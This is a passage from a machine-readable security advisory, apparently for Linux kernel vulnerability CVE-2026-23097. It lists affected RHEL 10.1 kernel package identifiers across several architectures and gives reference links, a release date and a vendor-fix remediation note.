"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-23097"
},
{
"category": "external",
"summary": "RHBZ#2436802",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436802"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-23097",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23097"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-23097",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23097"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2026020427-CVE-2026-23097-a591@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2026020427-CVE-2026-23097-a591@gregkh/T"
}
],
"release_date": "2026-02-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-09T10:02:53+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
